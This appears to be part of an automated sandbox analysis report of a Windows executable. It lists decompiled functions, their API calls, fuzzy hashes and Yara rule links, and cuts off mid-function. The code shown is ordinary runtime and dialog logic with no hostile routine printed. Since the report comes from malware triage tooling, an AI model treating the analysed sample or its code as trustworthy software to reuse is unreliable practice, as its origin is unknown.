              0x00d9b597
              0x00d9b5a5
              0x00d9b5b3
              0x00d9b5be
              0x00d9b5c9
              0x00d9b5d4
              0x00000000
              0x00d9b5e4
              0x00d9b5e9

              APIs
                • Part of subcall function 00D9B4CA: _free.LIBCMT ref: 00D9B4F3
              • _free.LIBCMT ref: 00D9B554
                • Part of subcall function 00D97A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?), ref: 00D97A66
                • Part of subcall function 00D97A50: GetLastError.KERNEL32(?,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?,?), ref: 00D97A78
              • _free.LIBCMT ref: 00D9B55F
              • _free.LIBCMT ref: 00D9B56A
              • _free.LIBCMT ref: 00D9B5BE
              • _free.LIBCMT ref: 00D9B5C9
              • _free.LIBCMT ref: 00D9B5D4
              • _free.LIBCMT ref: 00D9B5DF
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
              • Instruction ID: 92f3ba8429f2b73e94ca97e68bad54da0abefc33380900c800ea4b5994978499
              • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
              • Instruction Fuzzy Hash: 15115932540B08AADF20BBB0DD0AFDF779CEF01B10F414816B79EA6053DB28B6049674
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D91694, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00D91694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xdad680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00D9288E(__eflags,  *0xdad680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00D928C8(__eflags,  *0xdad680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00D97B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00D928C8(__eflags,  *0xdad680, 0);
								} else {
									__eflags = E00D928C8(__eflags,  *0xdad680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00D97A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








              0x00d9169b
              0x00d916ae
              0x00d916b5
              0x00d916b8
              0x00d916bb
              0x00d916d4
              0x00d916d4
              0x00d916bd
              0x00d916bd
              0x00d916bf
              0x00d916c9
              0x00d916cf
              0x00d916d0
              0x00d916d2
              0x00d916e2
              0x00d916e6
              0x00d916e8
              0x00d916fc
              0x00d916fc
              0x00d91705
              0x00d916ea
              0x00d916f8
              0x00d916fa
              0x00d9170e
              0x00d91710
              0x00d91710
              0x00000000
              0x00000000
              0x00000000
              0x00d916fa
              0x00d91713
              0x00000000
              0x00000000
              0x00000000
              0x00d916d2
              0x00d916bf
              0x00d9171b
              0x00d91725
              0x00d9169d
              0x00d9169f
              0x00d9169f

              APIs
              • GetLastError.KERNEL32(?,?,00D9168B,00D8F0E2), ref: 00D916A2
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D916B0
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D916C9
              • SetLastError.KERNEL32(00000000,?,00D9168B,00D8F0E2), ref: 00D9171B
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: a7e646870c2d5b8d38552848645e1dcdd74cdd216a0973c0be8b8a9b6f4a2650
              • Instruction ID: 2ae676618b5774b5837da3ae98c2d12f2d199d1986d2560b3924d2d6aec45af1
              • Opcode Fuzzy Hash: a7e646870c2d5b8d38552848645e1dcdd74cdd216a0973c0be8b8a9b6f4a2650
              • Instruction Fuzzy Hash: 7F01F23A609317AEAF252FB57C8593B3B89EB02375338033AF515856E2EF514C0192B8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00D8D27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xdcfe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xdcfe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xdcfe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








              0x00d8d27b
              0x00d8d286
              0x00d8d28e
              0x00d8d2a0
              0x00d8d2a4
              0x00d8d2b0
              0x00d8d2b8
              0x00000000
              0x00d8d2ba
              0x00d8d2c0
              0x00d8d2c5
              0x00d8d2cd
              0x00000000
              0x00d8d2cf
              0x00d8d2cf
              0x00d8d2cf
              0x00d8d2cd
              0x00d8d2a6
              0x00d8d2a6
              0x00d8d2a6
              0x00d8d2a6
              0x00d8d2dd
              0x00d8d2e3
              0x00d8d2eb
              0x00d8d2f1
              0x00000000
              0x00000000
              0x00000000
              0x00d8d2ed
              0x00d8d2ed
              0x00d8d2ed
              0x00d8d2ed
              0x00d8d2f5
              0x00d8d290
              0x00d8d293
              0x00d8d293
              0x00d8d288
              0x00d8d28b
              0x00d8d28b

              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: 390bee0583e61ad06af45e3df9c67e6f6a54c7b8cbc5ad42b5d20b0c58c46cd1
              • Instruction ID: 9cc032fc9d95d9700035957893e936b6e262f8503de0bdf8e0599de934e33e7c
              • Opcode Fuzzy Hash: 390bee0583e61ad06af45e3df9c67e6f6a54c7b8cbc5ad42b5d20b0c58c46cd1
              • Instruction Fuzzy Hash: AD01D172641363AB0F307FA95C90BA6338AAA43756318013AE800D33D1E761C845D7B8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D80910, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
              Download Yara Rule
              C-Code - Quality: 65%
              			E00D80910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00D7A995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E00D8DDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}
















              0x00d80910
              0x00d80914
              0x00d80923
              0x00d80925
              0x00d8092e
              0x00d80937
              0x00d80940
              0x00d80949
              0x00d80952
              0x00d80959
              0x00d8095e
              0x00d80972
              0x00d80a0e
              0x00d80a10
              0x00d80978
              0x00d80984
              0x00d809aa
              0x00d809bb
              0x00d809cb
              0x00d809d7
              0x00d809df
              0x00d809e5
              0x00d809ed
              0x00d809f3
              0x00d809f5
              0x00d809f9
              0x00d80986
              0x00d80990
              0x00d80996
              0x00d8099a
              0x00d8099a
              0x00d80a05
              0x00d80a07
              0x00d80a07
              0x00d80a13
              0x00d80a16
              0x00d80a18
              0x00d80a22

              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D8096E
                • Part of subcall function 00D7A995: GetVersionExW.KERNEL32(?), ref: 00D7A9BA
              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D80990
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D809AA
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D809BB
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D809CB
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D809D7
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: aeb5b05243c06873e46baa6ace6def76528a9b4b5096af3a2510b856a6848595
              • Instruction ID: 8ff86824888b53a67696abe3cb7fe8c61c5221a4ee7a05a46279dab7912576ce
              • Opcode Fuzzy Hash: aeb5b05243c06873e46baa6ace6def76528a9b4b5096af3a2510b856a6848595
              • Instruction Fuzzy Hash: 1B31B57A1183459AC744EFA9C8809ABB7E8FF98704F04491EF999D3210E730D549CB6A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D88BE2, Relevance: 9.1, APIs: 6, Instructions: 86COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00D88BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E00D8F3CA(_a8, 0xda40bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E00D8F3CA(_t32, 0xda40fc, _t25) != 0) {
						if(E00D8F3CA(_t32, 0xda40dc, _t25) != 0) {
							if(E00D8F3CA(_t32, 0xda40ac, _t25) != 0) {
								if(E00D8F3CA(_t32, 0xda414c, _t25) != 0) {
									if(E00D8F3CA(_t32, 0xda409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}








              0x00d88be6
              0x00d88beb
              0x00d88bf9
              0x00d88bfe
              0x00d88c10
              0x00d88c9f
              0x00d88c9f
              0x00d88ca2
              0x00d88ca4
              0x00d88ca7
              0x00d88caa
              0x00d88cb6
              0x00000000
              0x00d88cb7
              0x00d88c27
              0x00d88c42
              0x00d88c5d
              0x00d88c78
              0x00d88c9d
              0x00d88cae
              0x00d88cb1
              0x00000000
              0x00d88cb1
              0x00000000
              0x00d88c9d
              0x00d88c7a
              0x00d88c7d
              0x00d88c80
              0x00d88c84
              0x00d88c88
              0x00000000
              0x00d88c88
              0x00d88c5f
              0x00d88c62
              0x00000000
              0x00d88c62
              0x00d88c44
              0x00d88c47
              0x00000000
              0x00d88c47
              0x00d88c29
              0x00d88c2c
              0x00000000
              0x00d88c2c
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: b6d593cf9c5804ea6057282e606564094263dc5be28fe192d079e3d5f553e41b
              • Instruction ID: f9a164e5d3ba305b58a6576ebf87b28290ca2d4a5b7f11e66f1e3afe57a8227b
              • Opcode Fuzzy Hash: b6d593cf9c5804ea6057282e606564094263dc5be28fe192d079e3d5f553e41b
              • Instruction Fuzzy Hash: A421D3B164120AEFDB14BB10CC81E3B73ADDF90748F098629FC449A10AEA70ED45A3B4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D98516, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E00D98516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xdad6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00D97B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00D99BA9(_t25, _t36, __eflags,  *0xdad6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00D98388(_t25, _t31, 0xdd0418);
							E00D97A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00D97A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00D97AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xdad6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00D97B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00D99BA9(_t27, _t37, __eflags,  *0xdad6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00D98388(_t27, _t32, 0xdd0418);
									E00D97A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00D97A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00D99B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00D99B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















              0x00d98516
              0x00d98516
              0x00d98516
              0x00d98520
              0x00d98522
              0x00d98527
              0x00d9852a
              0x00d98538
              0x00d9853f
              0x00d98544
              0x00d98547
              0x00d9854a
              0x00d9855c
              0x00d98561
              0x00d98563
              0x00d9856e
              0x00d98575
              0x00d9857a
              0x00d9857d
              0x00d9857f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d98565
              0x00d98565
              0x00000000
              0x00d98565
              0x00d9854c
              0x00d9854c
              0x00d9854d
              0x00d9854d
              0x00d98552
              0x00d9858d
              0x00d9858e
              0x00d98594
              0x00d98599
              0x00d9859c
              0x00d9859d
              0x00d9859e
              0x00d985a5
              0x00d985a7
              0x00d985a9
              0x00d985ae
              0x00d985b1
              0x00d985bf
              0x00d985cb
              0x00d985ce
              0x00d985d1
              0x00d985e3
              0x00d985e8
              0x00d985ea
              0x00d985f5
              0x00d985fb
              0x00d98603
              0x00d98605
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d985ec
              0x00d985ec
              0x00000000
              0x00d985ec
              0x00d985d3
              0x00d985d3
              0x00d985d4
              0x00d985d4
              0x00d98607
              0x00d98608
              0x00d98608
              0x00d985b3
              0x00d985b9
              0x00d985bd
              0x00d98610
              0x00d98611
              0x00d98617
              0x00000000
              0x00000000
              0x00000000
              0x00d985bd
              0x00d9861e
              0x00d9861e
              0x00d9852c
              0x00d98532
              0x00d98536
              0x00d98581
              0x00d98582
              0x00d9858c
              0x00000000
              0x00000000
              0x00000000
              0x00d98536

              APIs
              • GetLastError.KERNEL32(?,00DB00E0,00D93394,00DB00E0,?,?,00D92E0F,?,?,00DB00E0), ref: 00D9851A
              • _free.LIBCMT ref: 00D9854D
              • _free.LIBCMT ref: 00D98575
              • SetLastError.KERNEL32(00000000,?,00DB00E0), ref: 00D98582
              • SetLastError.KERNEL32(00000000,?,00DB00E0), ref: 00D9858E
              • _abort.LIBCMT ref: 00D98594
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 523a64e4dd14c9d749d146a6ff375e09dbad4160344364da704bd20b73362807
              • Instruction ID: ad2e01bf182918204e3045b3a5d4ba7544e6ae04cde8afd70913aa193d1fe3ed
              • Opcode Fuzzy Hash: 523a64e4dd14c9d749d146a6ff375e09dbad4160344364da704bd20b73362807
              • Instruction Fuzzy Hash: 76F0A4351487006ADF5137796C4AF2E2669CBD3B61B2A0615F519D2291EE308A05A175
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E00D8C2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E00D712D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0xdcde34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0xdcde34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0xdcde34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










              0x00d8c2a8
              0x00d8c2ad
              0x00d8c2b2
              0x00d8c2b7
              0x00d8c2cf
              0x00d8c32f
              0x00000000
              0x00d8c331
              0x00d8c2d1
              0x00d8c2d7
              0x00d8c31c
              0x00d8c322
              0x00d8c32d
              0x00000000
              0x00d8c32d
              0x00d8c2dc
              0x00d8c2eb
              0x00000000
              0x00d8c2eb
              0x00d8c2e1
              0x00d8c2e4
              0x00d8c308
              0x00d8c30e
              0x00d8c2f1
              0x00d8c2f2
              0x00000000
              0x00d8c2f2
              0x00d8c2e9
              0x00d8c2ef
              0x00000000
              0x00d8c2ef
              0x00000000

              APIs
                • Part of subcall function 00D712D7: GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
                • Part of subcall function 00D712D7: SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              • EndDialog.USER32(?,00000001), ref: 00D8C2F2
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D8C308
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D8C322
              • SetDlgItemTextW.USER32(?,00000068), ref: 00D8C32D
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: c7aaa7daeed0e8364620d9fc5e90e30afc365f6d2774de700edd757debb96407
              • Instruction ID: c9744b3d5a0f41c35b2283160ad27f9d5a1d012950959adbca6b0451d1fcb48a
              • Opcode Fuzzy Hash: c7aaa7daeed0e8364620d9fc5e90e30afc365f6d2774de700edd757debb96407
              • Instruction Fuzzy Hash: A4012832660325FAD2106BA85D45F377B6DEB5BB01F044029F282F61D0C2B2AC059735
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D96B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 37%
              			E00D96B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0xda2260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E00D8E203(_t12, _v8 ^ _t22);
			}








              0x00d96b7f
              0x00d96b86
              0x00d96b89
              0x00d96b8d
              0x00d96b98
              0x00d96ba0
              0x00d96bb1
              0x00d96bb5
              0x00d96bbc
              0x00d96bc2
              0x00d96bc2
              0x00d96bc4
              0x00d96bc9
              0x00d96bce
              0x00d96bce
              0x00d96be1

              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D96B29,?,?,00D96AC9,?,00DAA800,0000000C,00D96C20,?,00000002), ref: 00D96B98
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D96BAB
              • FreeLibrary.KERNEL32(00000000,?,?,?,00D96B29,?,?,00D96AC9,?,00DAA800,0000000C,00D96C20,?,00000002,00000000), ref: 00D96BCE
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 27104ba8c222fb92692db3653a3ecae6fdca747c813de726348e7b9f82594692
              • Instruction ID: 0236031e593bb5b215d333dac72b864d75aec3dbce89d3e393da3534d9a217dd
              • Opcode Fuzzy Hash: 27104ba8c222fb92692db3653a3ecae6fdca747c813de726348e7b9f82594692
              • Instruction Fuzzy Hash: A4F04431A0131DBBCB155B95DC09BAEBFB8EB45715F044055F809E2290DB748A44CBB4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7E7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7E7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00D7FCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
